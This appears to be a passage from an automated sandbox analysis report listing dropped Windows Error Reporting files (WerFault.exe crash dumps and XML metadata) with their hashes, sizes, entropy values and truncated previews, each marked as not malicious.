                                                Entropy (8bit):3.702007541163776
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxC6ele6Y2D/SU9tyigmfU4npBj89b/ssf7IVm:R6lXJ06t6YSSU9tfgmfU4M//f7n
                                                MD5:B5E291381BD352541151384C798ABA2E
                                                SHA1:F7351999DDDF73E51FB3C2C62C36A689BBA1A7BC
                                                SHA-256:167DDF0C53D0CC448FF693EC79D17F18B435D23936EC9AFB72F62B03CAF50B0B
                                                SHA-512:2D850C5AA4D03A460179A4AC13F4445EBE4B4BD9BDF17A9C92A7805AF9C6A5DE422B5B3A63E28A425CD36629D89CA997463FA8BF7D25B67762F0D28FDAB2D3D9
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3212</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.498355926216897
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYwkYm8M4JPGtFkA+q8vZ61wWbxhQd:uIjf6kI7/X7VNJPsKg1ZbxhQd
                                                MD5:B505511D35CAB195918775AF03AE171D
                                                SHA1:E04FB25B492072EBA536C6F814CE83C8589D1202
                                                SHA-256:FF3DB892DA241D4A7A806D4D9AE79866A31FEA2904613DCC3FD8C500ED020425
                                                SHA-512:85EC725130E3752C8859B8D244DD305CAEC1CFDEB00DFC61B44D4729A4ADBD790BD090C4F124F30ED0BC5B6FEC1A8AB7E886206594380EC155AFECF313BBD936
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:05 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):67820
                                                Entropy (8bit):2.337176746913463
                                                Encrypted:false
                                                SSDEEP:384:NRsmD/bzs9kLAQ9JdeGXDglW1Nk2GAlEsuGzrTcmWlv2MebV27qa2G:NWa/bdLArGPORmZ1XE2Mu3G
                                                MD5:90B163D10DB8C27464E6A2E62F07ED9B
                                                SHA1:795BCBBC8D80941DD2761B9AE84D162211AC28A3
                                                SHA-256:42D7AEFC56927CEBF065ABCC98755C7B7684CB68AE39B280BC8202F95EE4FE3A
                                                SHA-512:2C32D039FBBA270CEFFB9CC2B8C879CCDCFB581CFB90B4B2A5F7B22CA1D20F8D2F5918F2DF435372DF9BB0E45A984565E3B1F878D04F516B3AA0AC242D2C2348
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7013623224757275
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxe6W6Y2DQSU9cyWjGgmfU4npBRC89b2ssfk5Sm:R6lXJI6W6Y9SU9cGgmfU4Z72/fC
                                                MD5:C22C8F300AFB07F233E473F06EBFDA65
                                                SHA1:B01C35180022A4264B7B00363225D93514D49E35
                                                SHA-256:127A3AEFA6000F306C1EA85B5607C6E989FA75890ECACE081EE838FECBE35190
                                                SHA-512:C633F55A39FC5EFFA9EB7AD94127D286F87E3E40142E6AEF336C127E5FAA21D1B379DDE910B38849B4CAF8F97A086A0D98768D6224CD95F000184FEA23E4BB17
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3212</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.499154860606887
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYsYm8M4JPGtF9+q8vZ61wWbxhQd:uIjf6kI7/X7VsJPuKg1ZbxhQd
                                                MD5:53352C1331A70C2F6D7DE0CEFCF07FE9
                                                SHA1:CDA215F913E7FB4204897A366C67544DEBE70443
                                                SHA-256:235091B5C3C015C76339DA37759C3648475A7314143AB951B55BE0C3F6D3A122
                                                SHA-512:33CA576900E4AF57902C7C30DF4195B0798790C1D74E27EE3A91273CBE7BFCDF9E2E8F87937798A424605C74B3CC47A64C52F400757E12D6B4B5CF657A125984
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:05 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):73848
                                                Entropy (8bit):2.0542068125685433
                                                Encrypted:false
                                                SSDEEP:384:R7xvOkbJPWQ9JGXoyeAl5TcmWlv2MjbV2fTYEgo:R7tOkbdWNoyeAl5E2MHWR
                                                MD5:764121DEF296C9815797ED101E72E095
                                                SHA1:5EEB71530C49BE09AFE6C0133D02D877F998C3A4
                                                SHA-256:D1AD07E1D82058C88BD5FDC3F2223F46BC35C677D2A2E5BA66AFA17DBA3ECB74
                                                SHA-512:240FDFD1F24E2E41B46FBB49EB87B1C1C17966C6159C0653829F1ACC4F885C013CBD963BF9D2F823AB9ECBB45AB762DBFF95E43898D5EB266015F14258BAE14E
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7015514784046593
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxdA6Gu6Y2DbSU9cyWjGgmfU4npBB89b2ssfnSm:R6lXJc6h6YWSU9cGgmfU4G2/fD
                                                MD5:82DCB20301028ADB28B4897AC66F3700
                                                SHA1:67FE5361D48B91845E06F7F5DE1F6DDC45AF869D
                                                SHA-256:2B7D80521FCBF106BFA559D2E9DF0E43D39880F8944471DDE3DE7218572C9C8B
                                                SHA-512:F5BC280339F4322212100A76A5308D50F016C3DA4D07F38910C978A397F215DAA933BDCD66ED3848115DAD555427CAC9AEBC4B3D6278953B4CC37B14AAFC5548
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3212</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.498058242731003
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYRYm8M4JPGtFB+q8vZ61wWbxhQd:uIjf6kI7/X7VxJPWKg1ZbxhQd
                                                MD5:354E929EA4A60301ECB16EA80B853D9E
                                                SHA1:1146CADFB7146F20C5131D0F26916EA868EC39D5
                                                SHA-256:881DE738FFB82A80ADE7E8B152DBAAD3D362FF15179B134574EC8C9416821539
                                                SHA-512:E5CFD4B9703824A6E932DA29CE9233F7CB2AB13CD6D949658673FB0B6D7E4DDCEE6BD042B5AB3EE1345A218B839AA979FC8FC95A17E3C6617A9DAD2F2F2D75C4
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:06 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):73424
                                                Entropy (8bit):2.0658448025077996
                                                Encrypted:false
                                                SSDEEP:384:wxvOHPbMaPEQQDVJKXET5TcmWlv2MjbV2bYUXVf7RQ:wtOvb7PE5DOET5E2MHODq
                                                MD5:8748B10A9BBFE0E0D6DD054A1395F4C6
                                                SHA1:A63B58996455083193A56748DBB8C09640E02BE7
                                                SHA-256:C7405EA42CAD791E548D85A79157B1072EDB2B48D0CA6ED5CD217C370BD64857
                                                SHA-512:C455F737147712A320BDC6BA56FF27773BDA983023C194D3854E6669A845C2D151F0143121A276BC180FB2600E3D41E74EE7711AD204A6E3930DB51288E354A6
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7018553783975996
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxD6PQ6Y2DrSU9cyWjGgmfU4npBx89bNssfvbjAvm:R6lXJ1646YGSU9cGgmfU4mN/fvbp
                                                MD5:32A51B02F522B5FF9A3B8D4E3D3976E9
                                                SHA1:E235C4CA4C527E6489253332B28416A4D2D40173
                                                SHA-256:6C839C045AA17333A4F7DAB6D050CA130E2B5D48AA6A17CFB581EBF7E36E7CB4
                                                SHA-512:FDCA9B11174D8501ED0D2E022A7265FEB9B423D73AFB0F5E1C0B8123229CF07CB1B74D8C1CE357D87165B9AB70E6F0B19419019016505CE0EB1453330BF8FCA3
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3212</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.498765390720549
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYCYm8M4JPGtF6+q8vZ61wWbxhQd:uIjf6kI7/X7VmJPxKg1ZbxhQd
                                                MD5:5759C05C09A6AA68E20B3DD5196D7734
                                                SHA1:AE225A02F0F00EC5DF89BD650D85FA5559715E71
                                                SHA-256:587AC63591836204FBA187FA16154045078C7D48D317CD9395E3A8ECAAEB0AB2
                                                SHA-512:8489D2870C520F62B0D12FA55E3D9608E02282706187F6EC1E4B529F7829042501CF37AF84AC2D04BE604AB9B9A35E3750EBD3F3B5A7E965F4C81A4BEA963D51
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:07 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):80488
                                                Entropy (8bit):2.0378424284478593
                                                Encrypted:false
                                                SSDEEP:384:fUQaBs+obXTxR0Q9JqKsGNmWlv2MjbV2+3nbG38LMS:c3BdobDxqkxp2MHjJM
                                                MD5:9B0CC853887A09288AA318DA68D91DF2
                                                SHA1:4E93D2F3B61DB9227B7FA4B1E6C49DE3DC07A35A
                                                SHA-256:DFE6ECBE2A6140BA24D86C85817150E5ADC0C258082D8333346365D1727A5556
                                                SHA-512:F0AD196CA6FA1F388727C7551E497FD2A409F66BED8B4AFF94C4116127313A4747F64CDA55F5DEED8B1983D920DE5F47F43491AFC23EA36B5725579A21A65C93
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7025053209083594
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxW636Y2DsSU9cyWjGgmfU4npBa89bubssfpIjm:R6lXJg636YhSU9cGgmfU4bub/fy6
                                                MD5:807C1FA04AB9C570D8518410E3A893D3
                                                SHA1:20597C18749D55897109C556C329D4BC09138D64
                                                SHA-256:DB03E6C69DF4D9DE9913BD90FBC40458CCC39A0B28449B8CB451B9524E26DBAF
                                                SHA-512:032F25C78FD4BCB14C0AA9A9CE03D08E6142B70425B5C266EA3E1B2C14E0D2505227729B187B73CEC513F4D2466304DDCC6B126627681FF6AD0A5113F374BF8B
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3212</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.5001614912616805
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VY5Ym8M4JPGtFJ+q8vZ61wWbxhQd:uIjf6kI7/X7VlJPaKg1ZbxhQd
                                                MD5:7E7203E9BF6194F3C6039F2E7DFB7A60
                                                SHA1:1F1F04A6094B409FF9D30348F6C9AFF778E73C52
                                                SHA-256:62C7789390C8E47615DED63673202C7D3D0559B81AF764B3544EF397BE08B80C
                                                SHA-512:526439A0A85C84EF0B0A08881D843EFF9944F4D301F949684D0430AB9AB08B7924DFA7AC7495A9DD155632BDC86CA7925030674AAC05407291DBD504C0B893B3
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:08 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):93212
                                                Entropy (8bit):2.1436196769691533
                                                Encrypted:false
                                                SSDEEP:384:Gy2aONvgAbVkEU4hoTSgQ9WiKa6EmWlv2MzbV2DqbGPV3f9ijXtu9jeG:VbO4AbGELhoTTta6w2M3zG5l
                                                MD5:C1BA034D12B7134D5E3FBA5DF361FB2D
                                                SHA1:FC3FBC78CD697908734C28F28331EB2DCC3617F5
                                                SHA-256:4888FF27C7BDC367E6CA81122FDCB66F5AB6EC1D27915D3BFD1716BF8199DC9B
                                                SHA-512:4382B8CF1CFCBC06BBACAF609501978340B05D55965607498F92E097F500D862C3BBD4BB7744C1BDC6636E3E2BFE1CCB75EDBB553CC149D099448CB831BD3C5E
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7029601557150396
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxC66r6Y2D/SU9OhgmfU4npBa89bTssfI0jxm:R6lXJ06G6YSSU9OhgmfU4bT/fI04
                                                MD5:9D1A85EA8BCABA864334DF6EF5897C9C
                                                SHA1:1655A7032F91B465588A7501566772091EC478F5
                                                SHA-256:AADA2E22CE72911FF600AB19216E117A9300206CC4DC42CDB86F918B32811003
                                                SHA-512:5D565D91D9C59D3145EB2CDC7FD3BF275B9E68D3121D03E350603538581E101DB066613DE76B298D625549CBA5FCB46D4FFE82F6AE8B4A31C13EE768A4FB0A14
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3212</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.500110931322714
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYJYm8M4JPGtFC+q8vZ61wWbxhQd:uIjf6kI7/X7VJJPhKg1ZbxhQd
                                                MD5:570F18C06D0A29473AB67362A49720BC
                                                SHA1:10BA71B2C1D8C7AA527368D02FC9FEFDA70F108A
                                                SHA-256:10EC0946B8F49CECACE5CFF8217BB09652B3F60CEB20292A9A46C5B206221011
                                                SHA-512:241028B60B0C9AC6AD4AD878F79697CC6735D27507C9F4197CDFA4C0BE753971274EE60D6B27B80E1FA1F6AB51BC23621A6CC493ABFF64F7915267606DF1BD19
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:40 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):51206
                                                Entropy (8bit):2.663137083611537
                                                Encrypted:false
                                                SSDEEP:384:oGU81pbCqN1GY8HVAfulv2MzbNO6q73zB31itL3tIY:oXUpbCfVJ2M36jDgq
                                                MD5:68E43416F49D4AE57D43FE578BDF15C0
                                                SHA1:6B35909B6D8793AD8FC1F92BECF82BB5F7687DA8
                                                SHA-256:326A754D8DFFDA443AE7DA596D3797BD80560AEC64D82A5A1140E0EFEE2C90C5
                                                SHA-512:BFCB287F1A20E56BE04E5D6D68A52796E6FA1F6644040950CD91773A6D4A2C8F20235DDC8B69694636D438E5F76CC2D8D906E3C2670EE897CA1213DC1A2332D7
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8320
                                                Entropy (8bit):3.6981411656432233
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxj6Ie96Y2DASU9jsBgmf6i0nprp89bfssfX1m:R6lXJl6Ie96YtSU9gBgmf6i08f/fI
                                                MD5:0B89AEC6A49B98574679DD139DFE0A23
                                                SHA1:BD317DD49E00F6425B502DADA637B8BB4C5F10BB
                                                SHA-256:2A632E1E9574AB4106F8F73394DC82D592B172BC800DBD15154283366E9C9D94
                                                SHA-512:A78614EDFD3F6FEAB043EE2937F96341704586B1E054CBBAF354E4EF319A4AF08D9AAD55EEFCC8E877F3548D35FF55EAAF8630F25EB1A28EFB55327D8AF3873F
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3212</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4579
                                                Entropy (8bit):4.483890293805548
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zssJg77aI9R2WpW8VYhYm8M4JPGNF8F+q86J1wWbxhQd:uIjfqI7/X7V1JP5h1ZbxhQd
                                                MD5:5C4860886BB6EE724E9CAA6C873DD095
                                                SHA1:92C6687E58C3657AD0B522C5E4305DC20D2A3888
                                                SHA-256:443E206F42B16AD6F94384C18351F42BD60386718800931334BE5C7B16C17873
                                                SHA-512:FB7F1451F6473045FCB0C49A8EC5688263D46A4B1896B969E1EE57E18F096AA5BCFBCB16DE0056382A432F174BFC7F7DD28141690FB7B1095B757E610999798F
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533847" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:43 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):47178
                                                Entropy (8bit):2.686801485354
                                                Encrypted:false
                                                SSDEEP:384:CGU81bbCqMgIcYUBfulv2MzbV2vsC6azIKidMekQ7:CXUbbCH2M3JCVGM27
                                                MD5:51B3493C007B8543D07E68113D0F724A
                                                SHA1:413C7AAFD47A4908620D3B6DFEF5D4DD9B75D0FE
                                                SHA-256:8203BCF636703282E4D6AF7B5550C796AF3F78AA81F97038CB557BA5B4AAF07B
                                                SHA-512:48CA0242EAB2020AD0DBF2C0796432BDACD021AE50FD2AFDCEBB173B480357F0310A33DCD71735A22C53DD5FB1F82560D79347E103C428DA165036E946F801D3
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8428
                                                Entropy (8bit):3.703192528400027
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxs6IeA6Y2DuSU9bWMgmfLfnpDa89bkssfbMm:R6lXJK6IeA6YTSU9aMgmfLfhk/fF
                                                MD5:4DF48D0A83DF1DD046D9B10F3F32E5AE
                                                SHA1:295F79A31010133B9BA7087B6675F1116B16C3D2
                                                SHA-256:176E130CA5640853E61BE5035B650A615120A7223FFD50006A4BC39027286B5B
                                                SHA-512:76578B1042DD39FD39FC7237C94969182E800EB3335ACFE42C50CB165E8BBDED39FA1EAA6DAEA94C3F655E8971FBF9869B6C3C292E398876CCCB7A3124090698
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3212</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4724
                                                Entropy (8bit):4.500692982549049
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zssJg77aI9R2WpW8VYgYm8M4JPG3O3FU+q8vZ3O01wWbxhQd:uIjfqI7/X7VoJPkFKlD1ZbxhQd
                                                MD5:01C2243E4F8B2A4256CC5B859FD59605
                                                SHA1:C87B3754E2AB37E521F0D79E4626A77170485CD8
                                                SHA-256:E9603EDB059A951C44075D1058D2F6736D090CB4D06D323C8FA07162C70EE686
                                                SHA-512:621E3230457F7E11E2029AE3928750E455E73459936EFC3B17124780984E0E533258E3AA9200095BD5E9ACE761F0E4E1A3C5EEA1DACA4595F8DFB52FD1F1777B
                                                Malicious:false
